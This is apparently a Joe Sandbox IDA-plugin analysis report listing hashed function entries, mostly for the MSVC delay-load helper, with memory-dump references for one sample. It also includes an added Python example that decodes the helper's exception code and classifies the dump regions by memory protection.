                                                                                                                                                                            • Opcode Fuzzy Hash: e7a85dcf5ec7b5cfe0a9a9189318a8088fa1dd4482de6337828009724ebc88d0
                                                                                                                                                                            • Instruction Fuzzy Hash: B9B0128527E000EC310471145E03C37010CC1C1B10331812BF440C1581D4804CF50131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 98d15778029f77ecbf407e98b4fcd0e7d9fe9cf9b911d058f13e74bf73dd7450
                                                                                                                                                                            • Instruction ID: 88ca9eb405a334ba85e4c8ff2ec6c2ef8050dc294a6f3c6c6c3b51fbb5d2fdcd
                                                                                                                                                                            • Opcode Fuzzy Hash: 98d15778029f77ecbf407e98b4fcd0e7d9fe9cf9b911d058f13e74bf73dd7450
                                                                                                                                                                            • Instruction Fuzzy Hash: 96B0128527E001EC310471145D03D37010CC1C1B10331412BF440C1981D4804CF40131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 47fdaf657c36b019363b8b3d5d97bf9612b73ae5bd4ae998e51d57533fde4441
                                                                                                                                                                            • Instruction ID: 84e0c0e0c461df9eada6f2f1ea7cb14235eb77717bf977c5d66aab228eac9b4f
                                                                                                                                                                            • Opcode Fuzzy Hash: 47fdaf657c36b019363b8b3d5d97bf9612b73ae5bd4ae998e51d57533fde4441
                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB0128527E000EC710471245D03C37010CC1C1B10331812BF840C1581D4804CF40131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 4eaf6c390e761c482db855168d4ff0144d5b0a5a3ba9be56d7aec04eb2621743
                                                                                                                                                                            • Instruction ID: 4d898f895e86b738028cbbcda2ed07bd46a743b4f73501794b7b07b960951031
                                                                                                                                                                            • Opcode Fuzzy Hash: 4eaf6c390e761c482db855168d4ff0144d5b0a5a3ba9be56d7aec04eb2621743
                                                                                                                                                                            • Instruction Fuzzy Hash: C4B0128927E002ED310473046D03C37010CD1C1B10330412BF444C1581D4804CF50131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: b486c9f2dbe77b66124f4c581e14dddd0d81b9ee81c5a2b9a0ab6baac897a942
                                                                                                                                                                            • Instruction ID: 507afb648f22d4fa7568be6a3a35d9994d0467702555133eb58d962c0806bfae
                                                                                                                                                                            • Opcode Fuzzy Hash: b486c9f2dbe77b66124f4c581e14dddd0d81b9ee81c5a2b9a0ab6baac897a942
                                                                                                                                                                            • Instruction Fuzzy Hash: B1B0128927E101ED324473046D03C37010CC1C1B10330422BF444C1181D4814CF50131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: dec5b46dfc565dd609f7c4675a2235ac5d2b5154c0b5440599f7ca025aa96fd9
                                                                                                                                                                            • Instruction ID: 225a7ad03bb597a31f49d9ecd23dbcb0226543d4b712ceaf80e7fdbf0d876378
                                                                                                                                                                            • Opcode Fuzzy Hash: dec5b46dfc565dd609f7c4675a2235ac5d2b5154c0b5440599f7ca025aa96fd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 50B0128927E001FD310473041D03C37010CC1C2B10330811BF844C2185D4804CF80131
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 00252233
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: d18aa07d201661da94051ba8b11e185f25d7dcaa626deee23c8d8a4eb59d80bc
• Instruction ID: 356c32adfb446451f87034215aec8dbcfb7337bc0e70e0b8814dbd1be5b7f022
• Opcode Fuzzy Hash: d18aa07d201661da94051ba8b11e185f25d7dcaa626deee23c8d8a4eb59d80bc
• Instruction Fuzzy Hash: 92C04C70215200DF8704CF74DA8DA0A77EABF62706B518468F844CB060C734DC64DE65
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 99185e8fdfb3f6a1dc01f5bdf29df5f198fd451769c717291266588797a56e9a
• Instruction ID: bd7917e9dea1f2a790a8b4be00a11e922f8e4e17a0728e578f3308313ef97cd1
• Opcode Fuzzy Hash: 99185e8fdfb3f6a1dc01f5bdf29df5f198fd451769c717291266588797a56e9a
• Instruction Fuzzy Hash: 46A002DA6BE111BC31097256FE07D3B121DC9D2F29331E62EF881D58CAA8D09EF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 19ee2e9fec2ff7e07ec5ad1cb59fb0a728f68a57229944729d5d54cccc478ae6
• Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
• Opcode Fuzzy Hash: 19ee2e9fec2ff7e07ec5ad1cb59fb0a728f68a57229944729d5d54cccc478ae6
• Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 4262bea3dadba92975d7d18f7c273363348ab5c57ecdbb4155e39dbec3e9a3e1
• Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
• Opcode Fuzzy Hash: 4262bea3dadba92975d7d18f7c273363348ab5c57ecdbb4155e39dbec3e9a3e1
• Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 510f32299e5c8e45de388f2e1a77a01420b8e137b4a11410f68ccd98f99815bd
• Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
• Opcode Fuzzy Hash: 510f32299e5c8e45de388f2e1a77a01420b8e137b4a11410f68ccd98f99815bd
• Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 54194da8214751aca9872859fc282d18c28e65ad1c362f6d689cd2429917738b
• Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
• Opcode Fuzzy Hash: 54194da8214751aca9872859fc282d18c28e65ad1c362f6d689cd2429917738b
• Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d6789ae46aaf5d16fbf41ffba05fc73d8b232c3303410febb6861633e2e162cc
• Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
• Opcode Fuzzy Hash: d6789ae46aaf5d16fbf41ffba05fc73d8b232c3303410febb6861633e2e162cc
• Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
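The function entries above repeat two opaque numbers that are worth decoding when triaging this report: the exception code C06D0057 passed to RaiseException by the delay-load helper, and the .sdmp memory-dump names. The following is an added example, not code from the Joe Sandbox report. The exception-code bit layout, FACILITY_VISUALCPP (0x6D, the VcppException facility from delayimp.h), the Win32 error numbers and the PAGE_*/MEM_* constants are Windows facts; the interpretation of the .sdmp name fields (field 4 as region base address, field 5 as PAGE_* protection, field 7 as MEM_IMAGE) is inferred from the names on this page, which the report does not document, and is an assumption.

```python
"""Decode Joe Sandbox function-entry identifiers: VcppException codes and .sdmp names.

Added example; not part of the Joe Sandbox report or its IDA plugin.
"""
import re
from dataclasses import dataclass

# Windows exception-code layout (winnt.h): bits 31-30 severity, bit 29
# customer, bits 27-16 facility, bits 15-0 code.
SEVERITY_NAMES = {0: "SUCCESS", 1: "INFORMATIONAL", 2: "WARNING", 3: "ERROR"}
FACILITY_VISUALCPP = 0x6D  # delayimp.h: VcppException(sev, err) = sev | (0x6D << 16) | err

# Win32 errors the MSVC delay-load helper wraps in VcppException().
WIN32_ERRORS = {
    0x57: "ERROR_INVALID_PARAMETER",  # 87: delay-load descriptor failed validation
    0x7E: "ERROR_MOD_NOT_FOUND",      # 126: delay-loaded DLL could not be loaded
    0x7F: "ERROR_PROC_NOT_FOUND",     # 127: delay-loaded export not found
}


@dataclass(frozen=True)
class ExceptionCode:
    code: int
    severity: str
    customer: bool
    facility: int
    error: int
    error_name: str


def decode_exception_code(code: int) -> ExceptionCode:
    """Split a RaiseException code into its severity/facility/error fields."""
    severity = SEVERITY_NAMES[(code >> 30) & 0x3]
    customer = bool((code >> 29) & 0x1)
    facility = (code >> 16) & 0xFFF
    error = code & 0xFFFF
    if facility == FACILITY_VISUALCPP:
        name = WIN32_ERRORS.get(error, "unknown VcppException error %d" % error)
    else:
        name = "not a VcppException"
    return ExceptionCode(code, severity, customer, facility, error, name)


# ASSUMPTION: .sdmp name fields are
#   <proc idx>.<phase>.<dump id>.<base addr>.<protection>.<state>.<type>.<n>.sdmp
# inferred from the names in this report; the report does not document them.
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: str
    mem_type: str
    executable: bool
    writable: bool


def parse_sdmp_name(name: str) -> DumpRegion:
    """Classify one .sdmp dump by base address, protection and memory type."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not a Joe Sandbox .sdmp name: %r" % name)
    base = int(m.group(4), 16)
    prot = int(m.group(5), 16) & 0xFF  # strip PAGE_GUARD/PAGE_NOCACHE modifiers
    mtype = int(m.group(7), 16)
    return DumpRegion(
        name=name, base=base,
        protect=PAGE_PROTECT.get(prot, "unknown 0x%02X" % prot),
        mem_type=MEM_TYPE.get(mtype, "unknown 0x%X" % mtype),
        executable=prot >= 0x10,
        writable=prot in (0x04, 0x08, 0x40, 0x80),
    )


def executable_regions(names):
    """Return the dumps worth disassembling first: executable image regions."""
    regions = [parse_sdmp_name(n) for n in names]
    return [r for r in regions if r.executable]


if __name__ == "__main__":
    print(decode_exception_code(0xC06D0057))
    for n in ("00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp",
              "00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp"):
        print(parse_sdmp_name(n))
```

Run against the names in the entries above, the 0x241000 dump is the only PAGE_EXECUTE_READ region (the code that ends up in the IDA snapshot), while the 0x289000 and 0x292000 dumps are PAGE_READWRITE data. C06D0057 decodes to severity ERROR, facility 0x6D, Win32 error 87 (ERROR_INVALID_PARAMETER) rather than the better-known delay-load failures 7E (ERROR_MOD_NOT_FOUND) and 7F (ERROR_PROC_NOT_FOUND).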
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 0850bc8e7c308d081b0b106c0b24f2b60126d81100785d03b0cf15a70db390c8
• Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
• Opcode Fuzzy Hash: 0850bc8e7c308d081b0b106c0b24f2b60126d81100785d03b0cf15a70db390c8
• Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 6bc96e1aade6ecbf03f71b05d4c6088b5435d08d0450f767d54678cc75bbe9af
• Instruction ID: 3167044138976261e5678662d4dbe8e27018e682c54510f4bbd6e82c04365d60
• Opcode Fuzzy Hash: 6bc96e1aade6ecbf03f71b05d4c6088b5435d08d0450f767d54678cc75bbe9af
• Instruction Fuzzy Hash: 93A0019E2BE512FD710873516E07C3B021DD5D2B21331861AF881D5586A98159E915B1
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8dd1823d20e89859f087fd56637279135110158220fb85cbc5c0331a31c40339
• Instruction ID: 33e6ea9128c3586a185991649f700f2d030352b0a0ff1f1d644b18247cec36f2
• Opcode Fuzzy Hash: 8dd1823d20e89859f087fd56637279135110158220fb85cbc5c0331a31c40339
• Instruction Fuzzy Hash: E9A0019A2BE512FC710873516E07C3B021DD5D6B613318A1AF882C5586A98159E91571
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ed7d97e0cb4ad913e7a78d0675e9d6745f5e798b4390fe006ae4c0962f797c0d
• Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
